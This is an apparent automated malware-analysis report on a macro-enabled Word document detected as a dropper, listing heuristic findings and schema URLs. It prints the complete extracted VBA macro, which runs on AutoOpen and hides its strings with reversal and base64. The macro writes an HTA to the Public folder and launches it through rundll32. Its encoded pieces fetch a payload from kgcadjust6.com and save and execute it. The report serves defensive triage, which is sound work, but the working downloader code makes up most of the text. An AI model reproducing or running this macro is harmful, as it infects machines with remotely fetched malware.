MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Dropper.Generic-9823794-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Generic-9823794-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set aVPfe = CreateObject(amaLIb("e" & "gas" & "sem.odc")) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9214 bytes |
SHA-256: c950c4d50c2d43f0408f22029916a94613f97b5e610b40db0737f4f71b9f8a39 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aeNB8"
Sub AutoOpen()
aaFNS
End Sub
Attribute VB_Name = "axQF7"
Sub aIpit(az1plX, a3Pxs)
' Herself infirmity forgot achieves governing
' Rook trends curvature madrid alleged
' Slowly
' Assail basque things
' Swindle subtle column negotiation
' Truck ipod
' Forthright meager consoles
' Uzbekistan directors regression
' Sloop reflects females links
' Prolixity tier standard controversial abase
' Nat scrawl conventional relevant
' Tions effeminate ephemeral
' Buffer mohawk smoldering awkwardness gpl plaza
' Himalayas titan introduces
' Curve temporarily latticed twenty-eighth
' Lorenz
' Databases craters bulgarian offering
' Precipitation consummation
' Stickers
' Stanley forsook
' Tasmania
' Algeria specializing petersburg mace citron
End Sub
Attribute VB_Name = "aneD8"
Public Const aOBZCw As String = "21232f297a57a5a743894a0e4a801fc3"
Public Const aWiEfe As String = "utf-8"
Function amaLIb(aV6qE)
' Accepting distant
' Town
' Rubble canadian glasses rx
' Cal stepmother released improved
' Roller halifax driver lighting
' Girl wight ronald
' Damn solvent sedge
' Here hk chat chicken
a28IaQ = 1
arnIy0 = Len(aV6qE)
al3Hi = ""
For a4SWJZ = 1 To arnIy0
' Colossus obligatory
' Pod disintegration cunt pascal introducing
' Wav vishnu
al3Hi = Mid(aV6qE, a4SWJZ, 1) & al3Hi
' Levitra vantage reel
' Salad bruno
' Democrat superfluity papers
' Infection submitting
' Sponsored trolley paolo athlete inch
' Surgeons local abu
' Lt emacs
' Planes heater
Next a4SWJZ
' Tighten halifax cranium
' Nationwide player recession
' Samaria capriciously
' Tile dana versification
' Disciplined href bewitched edwards
' Rep advances
' Fu
' Detrimental bungalow rivulet picnic afterthought
' Appointed folder
' Factory choleric
' Pickaxe
amaLIb = al3Hi
End Function
Function auZIzw(aeDyc)
Set aVPfe = CreateObject(amaLIb("e" & "gas" & "sem.odc"))
With aVPfe.BodyPart
.ContentTransferEncoding = amaLIb("46e" & "sab")
With .GetEncodedContentStream
.WriteText aeDyc
.Flush
End With
With .GetDecodedContentStream
.Charset = aWiEfe
auZIzw = .ReadText
End With
End With
' Rationally
' Sake combatant dish unavoidable duration
' Argumentative alliance
' Jubilant jewish layout
End Function
Sub a6pB2w(aBVS6, arm9Ot)
' Simplified
' Exterminate reflex sully
' Burgher gc infectious indiscreet through honor
' Pres pa ryan tattoo
' Novel subterfuge
' Undefiled detest
' Bewitched saturated le
' Mu collected cropped indelicate exalt
' Inflame hits waitress parenthesis
' Dynamo ignominious
' Incompatible
Open aBVS6 For Output As #1
Print #1, arm9Ot
Close #1
End Sub
Function Des(aVDNWp, azbCc, apL8MF)
' Allison dissemble
' Fax highlander reunion loins
' Abs indelicate suzerainty
' Monologue wine cost
Des = Replace(auZIzw(aVDNWp), azbCc, apL8MF)
End Function
Sub aaFNS()
alcfk = Des("Y2ExOWdIbTphMTlnSG1cYTE5Z0htd2ExOWdIbWlhMTlnSG1uYTE5Z0htZGExOWdIbW9hMTlnSG13YTE5Z0htc2ExOWdIbVxhMTlnSG1zYTE5Z0hteWExOWdIbXNhMTlnSG10YTE5Z0htZWExOWdIbW1hMTlnSG0zYTE5Z0htMmExOWdIbVxhMTlnSG1tYTE5Z0htc2ExOWdIbWhhMTlnSG10YTE5Z0htYWExOWdIbS5hMTlnSG1lYTE5Z0hteGExOWdIbWVhMTlnSG0=", "a19gHm", "")
aQfqs = Des("Y2FOOVVTSTphTjlVU0lcYU45VVNJdWFOOVVTSXNhTjlVU0llYU45VVNJcmFOOVVTSXNhTjlVU0lcYU45VVNJcGFOOVVTSXVhTjlVU0liYU45VVNJbGFOOVVTSWlhTjlVU0ljYU45VVNJXGFOOVVTSXBhTjlVU0l1YU45VVNJYmFOOVVTSWxhTjlVU0lpYU45VVNJY2FOOVVTSS5hTjlVU0ljYU45VVNJb2FOOVVTSW1hTjlVU0k=", "aN9USI", "")
aVABHZ = Des("Y2F1OFpKOmF1OFpKXGF1OFpKdWF1OFpKc2F1OFpKZWF1OFpKcmF1OFpKc2F1OFpKXGF1OFpKcGF1OFpKdWF1OFpKYmF1OFpKbGF1OFpKaWF1OFpKY2F1OFpKXGF1OFpKaWF1OFpKbmF1OFpKZGF1OFpKZWF1OFpKeGF1OFpKLmF1OFpKaGF1OFpKdGF1OFpKYWF1OFpK", "au8ZJ", "")
akGyJ = Des("cmE4dDZGdWE4dDZGbmE4dDZGZGE4dDZGbGE4dDZGbGE4dDZGM2E4dDZGMmE4dDZGLmE4dDZGZWE4dDZGeGE4dDZGZWE4dDZGIGE4dDZGdWE4dDZGcmE4dDZGbGE4dDZGLmE4dDZGZGE4dDZGbGE4dDZGbGE4dDZGLGE4dDZGT2E4dDZGcGE4dDZGZWE4dDZGbmE4dDZGVWE4dDZGUmE4dDZGTGE4dDZG", "a8t6F", "")
' Cider expanded validity thoroughly chrysalis
' Seekers
' Wellness gourd
' Z meanwhile
' Replacing passion seconds
' Knife landward melissa
' Transport
' Fda nocturnal engines
' Backwoods indemnification update urgency liberalism lawyer
' Connected
' Distilled
' Omelet
a7SdU = "KCIiKTsNCnZhciBhUnpoQyA9ICJjOlxccHJvZ3JhbWRhdGFcXGFIeHZVOS5wZGYiOw"
a54Nf = "VEajB4ID0gInItIEFnb2xhaUR3b2hTLCIuc3BsaXQoIiIpLnJldmVyc2UoKS5qb2lu"
' Candidacy widespread jordan
' Bespoke coax damnable repulsion ranks justin
' Liberty
' Swiss canister scholarly dismount skip
a8K5nk = "Jtdl93JkJPa09BPVlXelBEa1FMJnhPPUNPdlZOVk1KTCIsIGZhbHNlKTsNCmFqYnF0"
aokvC = "KTsNCnZhciBhamJxdCA9IG5ldyBBY3RpdmVYT2JqZWN0KCJtc3htbDIueG1saHR0cC"
aVhgw = "Y2xvc2UoKTsNCg0KPC9zY3JpcHQ+"
' Charlatan springs weighted fastidious clinton compounds
' Fetter casinos humanities
' Impact shunned seventy-seven discrete sophisticated
aHvSo = "VGhlbg0KCVNldCBhTmszeiA9IENyZWF0ZU9iamVjdCgiYWRvZGIuc3RyZWFtIikNCg"
aGDXK7 = "IpOw0KYWpicXQub3BlbigiR0VUIiwgImh0dHA6Ly9rZ2NhZGp1c3Q2LmNvbS9mb3J1"
' Having highs
' Spotless preferences
' Civic gauge
' Flail gauge french transcription
arHck = "thdFlQdWRdKGFENXVGICsgIjMyICIgKyBhUnpoQyArIGFlRGoweCk7DQp3aW5kb3cu"
alpDF = "ZXkxP2Z6PUpBQmlYV3J4bnRQaG4mcnJrbT1Cd1J4RVRaJlZqPXJvWmNkbVhXZ2VmUF"
aUrdeH = "Q1dkZWSnNzTnJLZUF2X0dXT3ZjNG9PNFl3V0tKcXBZVmFsbVAyalhYeVhFL2Zmc2xh"
' Banks miami nearest
' Citizenship feels
' Sambo licentiousness englishwoman possible partition sizes update
' Diamond kidnap graze
aHoGWs = "xvc2UNCkVuZCBJZg0KDQo8L3NjcmlwdD4NCg0KPHNjcmlwdCBsYW5ndWFnZT0iamF2"
a9N4Ub = "B0Ij4NCg0KYUQ1dUYgPSAicnVuZGxsIg0KDQpJZiBhamJxdC5zdGF0dXMgPSAyMDAg"
aNmYdC = "ZXNwb25zZWJvZHkNCglhTmszei5TYXZlVG9GaWxlIGFSemhDLCAyDQoJYU5rM3ouQ2"
' California
' Packs mainstream unless adoring
' Butchers
' Assessing fx ix sideboard
akU1q = "lhTmszei5PcGVuDQoJYU5rM3ouVHlwZSA9IDENCglhTmszei5Xcml0ZSBhamJxdC5y"
' Combo rent
' Result somalia autocracy wallet mathematically
' Onion specify ot piston commune administrators
adzmx = "Vocy50cGlyY3N3Ii5zcGxpdCgiIikucmV2ZXJzZSgpLmpvaW4oIiIpOw0KdmFyIGF0"
' Made pinkerton dastardly
' Ornate unstable forestry spiritualism
' Boils privilege berber
' Movies se peacock royal
aVUEZb = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQoNCnZhciBhUWcxZCA9ICJsbG"
' Rigorous networking str ban belated
' Trials canary possibly remember
' Turbulence regards ding
akf6g = "LnNlbmQoKTsNCg0KPC9zY3JpcHQ+DQoNCjxzY3JpcHQgbGFuZ3VhZ2U9InZic2NyaX"
a90geX = "0KDQp3aW5kb3cucmVzaXplVG8oMSwgMSk7DQp3aW5kb3cubW92ZVRvKC0xMCwgLTEw"
' Servitor tournaments kazakhstan
' Poole
' Tacitly nitric
' Plaudits occupancy mate
aHJK5h = "bS92aWV3cG9zdC9PWmphRHJQR01yTHJsQTMwT2NiTU84VE1sVUZGaktaOVl3SWNsUW"
' Sambo responsibility touchstone
' Rank newfoundland cm annul
' Morale mussulman residential curd
' Brook magnanimously
avntS = "WVB1ZCA9ICJudXIiLnNwbGl0KCIiKS5yZXZlcnNlKCkuam9pbigiIik7DQp2YXIgYW"
' Colloquy
' Bahrain tamil
' Clipping chime
' Piston narrator muslim bbs
agtTW5 = "YXNjcmlwdCI+DQoNCnZhciBhcmt6RyA9IG5ldyBBY3RpdmVYT2JqZWN0KGFRZzFkKV"
arm9Ot = auZIzw(aVUEZb & adzmx & avntS & a54Nf & a7SdU & a90geX & aokvC & aGDXK7 & aHJK5h & aUrdeH & alpDF & a8K5nk & akf6g & a9N4Ub & aHvSo & akU1q & aNmYdC & aHoGWs & agtTW5 & arHck & aVhgw)
' Earl thorough bernard
' Yo outgrown petulant
' Cause thong memorabilia
a6pB2w aVABHZ, arm9Ot
' Networking
' Polynesia crater booth wisdom marred literacy
' Grandee robinson dui
' Bouquet senator script recipe
' Valley lie horror
' Fits pert lv problems cockade
' Gull waft wanting
' Ointment smarter theft plaything tracy ibm interrogation
' Jess zshops johnson neighbors
' Backgammon overdue
' Byzantine teams customise disk hash
' Emaciated ri magical
' Practical turkish
' Sorry stamps virtual
' Inadvertently
' Never contrition
' Velvet
' Held
' Ghz grades
' Gymnasium nm
' Butchers ravenously ecology a depravity dining
' Aw habitat
' Massive buffer accomplishes xerox funding
' Nutriment parochial nuts
' Phi
' Intuitive productive harmonize
' Letter
a6jPa = Des("d2FiZENCc2FiZENCY2FiZENCcmFiZENCaWFiZENCcGFiZENCdGFiZENCLmFiZENCc2FiZENCaGFiZENCZWFiZENCbGFiZENCbGFiZENC", "abdCB", "")
CreateObject(a6jPa).run (akGyJ & " " & aVABHZ)
End Sub
Attribute VB_Name = "aChxWo"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function azVcvA(aapoVD)
' Racks hobby revenge heart brokers sb
' Deface bomb gymnasium
' Spiral au cardiac paralyze
' Universality misgivings limitations ave impropriety abstract missing
' Outlay thered
' Colony magnificently houses dod
' Src roseate confidante
' Blowing
' Reporter softball
' Lowest birthright
' Z legitimacy estate inversion finished
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 36864 bytes |
SHA-256: f92b6dd6f8d6fd08df0957fe80352798045cdf185e99cc9181c91f5f1eb5413b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.